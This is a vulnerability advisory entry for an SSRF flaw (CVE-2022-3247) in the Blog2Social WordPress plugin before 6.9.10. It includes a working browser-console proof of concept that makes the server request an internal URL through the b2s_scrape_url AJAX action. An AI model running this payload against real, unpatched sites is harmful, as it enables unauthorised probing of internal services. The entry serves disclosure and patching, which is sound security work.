WordPress Plugin Vulnerabilities

Blog2Social < 6.9.10 - Subscriber+ SSRF

Description

The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks

Proof of Concept

Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social)

// Set this callback_url to the internal url you want the server to call
callback_url = 'http://127.0.0.1:8080/';
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';

// Don't edit below
data = new FormData();
data.append('action', 'b2s_scrape_url');
data.append('url', callback_url);
data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());

fetch(wp_site_ajax_url, {
    method: 'POST',
    credentials: 'same-origin',
    body: data
});

Affects Plugins

Plugin icon
blog2social
Fixed in 6.9.10

References

CVE
CVE-2022-3247

Classification

Type
SSRF
OWASP top 10
A1: Injection
CWE
CWE-918
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Sakri Rafael Koskimies
Submitter
Sakri Rafael Koskimies
Submitter website
https://saggre.com
Verified
Yes
WPVDB ID
ee312f22-ca58-451d-a1cb-3f78a6e5ecaf

Timeline

Publicly Published
2022-10-03 (about 1 years ago)
Added
2022-10-03 (about 1 years ago)
Last Updated
2022-10-03 (about 1 years ago)

Other

Published
Title
Published
2023-10-19
Title
Motors – Car Dealer & Classified Ads < 1.4.7 - Unauthenticated SSRF
Published
2024-03-29
Title
Builderall Builder for WordPress < 2.0.2 - Unauthenticated Server-Side Request Forgery
Published
2024-04-22
Title
Podlove Podcast Publisher < 4.0.12 - Authenticated (Contributor+) Server-Side Request Forgery
Published
2024-03-20
Title
Avada < 7.11.7 - Authenticated (Contributor+) Server-Side Request Forgery via form_to_url_action
Published
2023-12-21
Title
JSM file_get_contents() Shortcode < 2.7.1 - Contributor+ SSRF